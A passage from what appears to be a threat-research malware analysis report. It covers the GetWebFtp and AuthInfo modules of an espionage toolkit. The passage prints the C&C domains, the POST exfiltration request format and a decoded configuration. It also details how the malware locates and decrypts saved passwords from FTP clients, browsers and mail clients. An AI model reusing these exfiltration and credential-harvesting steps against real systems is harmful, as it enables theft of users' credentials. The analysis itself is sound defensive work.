  42. 42. WAIS serverGopher serverFTP serverHTTP serverHTTPS serverIn file prefs.js it looks for strings:user_pref("network.proxy.socks"user_pref("network.proxy.socks_port"user_pref("network.proxy.ftp"user_pref("network.proxy.ftp_port"user_pref("network.proxy.ssl"user_pref("network.proxy.ssl_port"user_pref("network.proxy.http"user_pref("network.proxy.http_port"Then malware compresses the information stored in memory using ZLib library and encrypted with custom algorihtm.Then it connects to the C&C server defined in AAA config and sends a POST request containing compressed, xored andbase64-encoded data:POST http://nt-windows-online.com:80/cgi-bin/nt/sk HTTP/1.0Host: nt-windows-online.com:80Pragma: no-cacheCache-Control: no-cacheContent-length: 29276Content-Type: application/x-www-form-urlencodedData formatMalware collects the data in the memory allocated on the heap. The memory chunk with the prepared data starts with themagic number (4E 44 00 00) following by the filename as Unicode string (@INFOSYSINFO_%u_%s.bin) and the size ofdata.
  43. 43. After the size value comes the actual information part. This part is compressed and encrypted/encoded and sent via thePOST request. Data in this part is structured in the same order as it was retrieved (so first comes the system info, then disksinfo, network adapters, URL history, etc.). All strings are Unicode – with the exception of browsing info, which is encoded nANSI.GetWebFtp moduleKnown variants: MD5 Compilation date (payload) d1699431d56a690e1b84aa8dddffd28f 2012.10.22 07:05:01 (GMT)The file is a PE DLL file, compiled with Microsoft Visual Studio 2005. No functions are exported.Network functionAll the requests to a CnC server are of the following pattern:POST http://%CnC%/cgi-bin/nt/sk HTTP/1.1Host: %CnC%Connection: closeContent-Length: %drnrnDATAThe POST data is of the following structure:Number1 + HexString + "rnSubject: %srnrn" + BufferNumber1  is 16-byte value that depends on VolumeSerialNumber, Computer name and “ProductID” key inHKLMSOFTWAREMicrosoftInternet ExplorerRegistrationBuffer is compressed with Zlib, encrypted with a modified PKZIP stream cipher, and then it is Base64-encoded.The list of the CnCs:nt-windows-online.com;nt-windows-update.com;nt-windows-check.comAfter resolving CnC domain tries to directly send POST request.It always expects the server to return “500” error code («Internal Server Error») in all the requests. If this error code actuallyreceived then the function returns success, and no more actions in the network function are done.If the first sending-receiving routine returns failure then the module tries to find a proxy server and connect to it. For thatpurpose it retrieves a path to a browser in a registry:
  44. 44. HKLMSOFTWAREClassesHTTPshellopencommandIf the browser is InternetExplorer then checks the following keys:HKCUSoftwareMicrosoftWindowsCurrentVersionInternet SettingsProxyEnableHKCUSoftwareMicrosoftWindowsCurrentVersionInternet SettingsProxyServerIf the browser is Firefox then reads the file %APPDATA%MozillaFirefoxprofiles.ini and retrieves its “Path” value. After thatreads %APPDATA%MozillaFirefox%Path%prefs.js and retrieves proxy and port from the settings starting with “user_pref(network.proxy.*”.If the browser is Opera then reads the file %APPDATA%OperaOperaprofileopera6.ini, finds the [Proxy] section and findsstring which matches “HTTP.*=.*:.*” and retrieves server and port from it.DllMainTries to call RegisterServiceProcess API from kernel32.dll (this API existed in Windows 9x)Sends POST request with the Subject: “Reflebt” and “===” Buffer.Starts searching for specific files on the following Drives: (c:,d:,e:,f:,g:)The list of interested files: "*.odu" "*.pfx" "Favorites.dat""FileZilla.xml""History.dat""Quick.dat""RushSite.xml""ScribeOptions.xml""Sites.dat""Sites.xml""SmartFTP*""TheBee.ini""account.cfn""account.xml""accounts.ini""addrbk.dat""andrq.ini"
  45. 45. "bpftp.dat""clients.dat""digsby.dat""ftplist.txt""global.xml""keychain.plist""signons.txt""sm.dat""smdata.dat""users.txt""wand.dat""wcx_ftp.ini""ws_ftp.ini"Also the module enumerates network shares. The initial purpose of that seems to be searching for the same files in thenetwork shares, but there is a bug in the code which prevents from doing it. (FindFirstFile API call doesn’t get the string withwildcards as its first parameter, it only gets the string of a network share without appending a wildcard to it, so the APIalways returns INVALID_HANDLE_VALUE).If any of these files is found, then the module adds its information to a Buffer for POST request which contains the following:file path, file contents, file creation time, last access time, last write time (all system time format), file size, the current positionin stream, the number of bytes read from file. The final Buffer can contain information about several files at once. The non-compressed Buffer size can’t exceed a definite value (a little more than 358571 bytes), and the files can be partially sent.POST request with files is sent with the Subject: “Reflect”.After all the files are processed the module sends the final POST request with the Subject: “Refleet” and “===” Buffer.AuthInfo ModuleKnown variants: MD5 Compilation date (payload) 793c82efc65a43ed249a45ec7c69a388 2012.09.05 07:02:18 (GMT) 428de53f1a1eaa040847b6456b7e5369 2012.09.05 07:02:18 (GMT)SummaryThe file is a PE DLL file, compiled with Microsoft Visual Studio 2010. No functions are exported. Its main purpose is to stealcredential information from various popular file managers, email clients, browsers and FTP client software.DllMain functionWhen loaded, the module retrieves its resource of type “BBB” and name “AAA”, and starts an internal plugin framework. Themain function of the module is named “task_authinfo” and is registered in the framework. Then, it starts the framework main
  46. 46. loop, effectively parsing the resource data and executing the list of actions encoded in the resource.The decoded resource data for the known sample can be represented as the following script:SetOption(conn_a.D_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com") SetOption(conn_a.D_NAME, [15] "/cgi-bin/nt/sk") SetOption(conn_a.D_RPRT, [3] "80") SetOption(conn_a.D_SPRT, [3] "80") SetOption(conn_a.D_USER, [21] "%removed%") SetOption(conn_a.D_MODE, 0x0033) SetOption(conn_a.D_PASS, 0x00) SetOption(conn_a.J_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com") SetOption(conn_a.J_NAME, [15] "/cgi-bin/nt/th") SetOption(conn_a.J_USER, [21] "%removed%") SetOption(conn_a.J_RPRT, [3] "80") SetOption(conn_a.J_SPRT, [3] "80") SetOption(conn_a.J_MODE, 0x0033) SetOption(conn_a.J_PASS, 0x00) SetOption(conn_a.VERSION_ID, [6] "51070") SetOption(conn_a.SEND_DELAY_TIME, [6] "20000") SetOption(conn_a.VER_SESSION_ID, [11] "%removed%") Call(task_authinfo)The module creates two output buffers (lets call them Buffer1 and Buffer2).The Buffer1 starts with the following string: "@INFOAUTHINFO_%u_%s.txt"Where %u equals to 6, %s is system time in the following format: "%04u%02u%02u_%02u%02u%02u_%03u"If FileTimeToSystemTime API failed, it uses the default time string: "16010101_000000_000"If wsprintfW API failed, it uses the default hardcoded filename: "@INFOSYSINFO_X_00000000_000000_000.txt"Also it constructs the following string: "@INFOAUTHINFO_%u_%s.bin” for being a header of Buffer2, but the module iscompiled in that way that the retrieved data is not copied to Buffer2 and as a result is not sent to the CnC (that’s probably adeveloper’s mistake).Buffer1 (.txt) is used to store general information text strings for logging purpose, and Buffer2 (.bin) is used to storeinformation retrieved from the registry values and file contents, including binary data.Data collectionIn all the functions if a host is retrieved, it is also resolved to its IP.
  47. 47. 1.  Far Manager FTP dataBuffer1 sample data:START  BEGIN : Far  FAR : regkey %s opened – OK  END : Far, size : %dExtracts the following data from registry for Buffer2:HKCUSoftwareFar2PluginsFTPHostsItem“HostName“, “ User“, “Password“ values data.The “Password” value data is decrypted with a publicly known FAR FTP decryption algorithm based on simple XOR.2.  Winscp dataBuffer1 sample data:  BEGIN : Winscp    WINSCP : regvalue username found  - OK  END : Winscp, size : %dEnumerates subkeys in the following key and retrieves value data for Buffer2:HKCUSoftwareMartin PrikrylWinSCP 2SessionsValue names: “UserName”, "Password", "PortNumber", "FSProtocol", "HostName"The “Password” value data is decrypted with a publicly known Winscp algorithm which is based on a bitwise operations andXOR using “UserName” concatenated with the “HostName” as a key.3.  TotalCommander dataBuffer1 data sample:  BEGIN : TotalCommander    TOTAL COM : wcx_ftp.ini found – OK  END : TotalCommander, size : %dSearches for “wcx_ftp.ini” file, reads its contents and extracts values for parameters: "username", "host", "password".The “password” value data is decrypted with a publicly known TotalCommander algorithm which is based on XOR.4.  Internet Explorer 7 and 8 dataBuffer1 data sample:  BEGIN : IE78
  48. 48.     IE78 : regkey opened – OK  END : IE78, size : %dEnumerates value names in the following key:HKCUSoftwareMicrosoftInternet ExplorerIntelliFormsStorage2The module creates Microsoft URL History Service instance and enumerates URLs from the browser history. It calculatesURL hash using CryptHashData API (SHA1 algorithm) and compares it with the value names from the previous registry key.If they coincide the module retrieves the registry data for the corresponding hash and decrypts the data usingCryptUnprotectData API. As a result Autocomplete passwords and the corresponding URLs are obtained.5.  Internet Explorer 6 and Outlook dataBuffer1 data sample:  BEGIN : IE6, OutlookEx    OUTLOOK EXP : LoadLibrary: pstorec.dll: %u – ERROR    IE6 : pstore contains data - OKAttempts to load library called “pstorec.dll”. If pstorec.dll library couldn’t be loaded then starts working with registryimmediately.If the library is successfully loaded then retrieves an interface pointer to a storage provider, enumerates provider types andsubtypes. If the Resource Type corresponds to IE Protected Site or Outlook Account then reads the data item name and thedata item buffer. As a result it retrieves IE HTTP/FTP basic authentication password and corresponding hosts, for Outlook itretrieves POP3 passwords and proceeds with working with registry. If the ResourseType corresponds to IE6 the module alsointerprets ItemName as a URL, and resolves the host to IP.In case of Outlook enumerates subkeys of the following key and retrieves the value data in them:HKCUSOFTWAREMicrosoftInternet Account ManagerAccountsValues: “POP3 Password2", "IMAP Password2", "HTTPMail Password2".If one of the values data coincides with previously retrieved passwords from PStore, then retrieves the remained values data: Account Name SMTP Email Address SMTP Server HTTPMail User Name HTTPMail Server POP3 User Name POP3 Server IMAP User Name IMAP Server6.  Opera, Chrome, Firefox, Thunderbird dataBuffer1 sample data:  BEGIN : Opera, GCH, MFF, THB
  49. 49.     OPERA : wand.dat file found and read – OK    CHROME : Login Data file found and read – OK    THUNDERBIRD : signon file path %s found - OKOpera: Reads file: %APPDATA%OperaOperawand.dat, decrypts it (3DES + proprietary), parses it and retrieves hosts andcorresponding passwords.Chrome: In the Chrome processing function the module uses SQLLite lib to read file“%LOCALAPPDATA%GoogleChromeUser DataDefaultLogin Data“ as a DB. It makes a query “SELECT * FROM logins”to retrieve hosts and saved passwords. It retrieves "Password_value" field to decrypt with CryptUnprotectData API call.Firefox:  Reads the file %APPDATA%MozillaFirefoxprofiles.ini and retrieves “User Profiles Path” from it.Queries value in the following key to retrieve Firefox path:HKLMSOFTWAREClientsStartMenuInternetfirefox.exeshellopencommandIn the Firefox directory tries to load nss3.dll, plc4.dll and get the following functions: NSS_Init, NSS_Shutdown,PK11_GetInternalKeySlot, PK11_FreeSlot, PK11_Authenticate, PK11SDR_Decrypt, PK11_CheckUserPassword,PL_Base64Decode.Sequentially tries to open and read file %FirefoxProfilesPath%signons.txt or signons2.txt or signons3.txt or sqlite.sqlite(these files used in different Firefox versions). In case of the *.txt files the module parses a file, retrieves urls, decryptsusernames and passwords using PL_Base64Decode and PK11SDR_Decrypt. In case of sqlite.sqlite it makes a query“SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins”, decrypts usernames and passwordsusing PL_Base64Decode and PK11SDR_Decrypt functions.Thunderbird: Reads the file %APPDATA%Thunderbirdprofiles.ini and retrieves “User Profiles Path” from it. Queries valuein the following key to retrieve Thunderbird path:HKLM SOFTWAREClientsMailMozilla ThunderbirdshellopencommandIn the Thunderbird directory tries to load nss3.dll, plc4.dll and get the following functions: NSS_Init, NSS_Shutdown,PK11_GetInternalKeySlot, PK11_FreeSlot, PK11_Authenticate, PK11SDR_Decrypt, PK11_CheckUserPassword,PL_Base64Decode.Sequentially tries to open and read file %ThunderbirdProfilesPath%signons.txt or signons2.txt or signons3.txtor sqlite.sqlite(these files used in different Thunderbird versions). In case of the *.txt files the module parses a file, retrieves urls, decryptsusernames and passwords using PL_Base64Decode and PK11SDR_Decrypt. In case of sqlite.sqlite it makes a query“SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins”, decrypts usernames and passwordsusing PL_Base64Decode and PK11SDR_Decrypt functions.7.  The Bat dataBuffer1 data sample:  BEGIN : The Bat    THE BAT : Account.CFN %s read – OKSearches for the “Account.CFN” file, decrypts it with an algorithm based on a bitwise operations and 1-byte XOR, thenextracts hostnames, usernames and passwords.8.  Filezilla data

×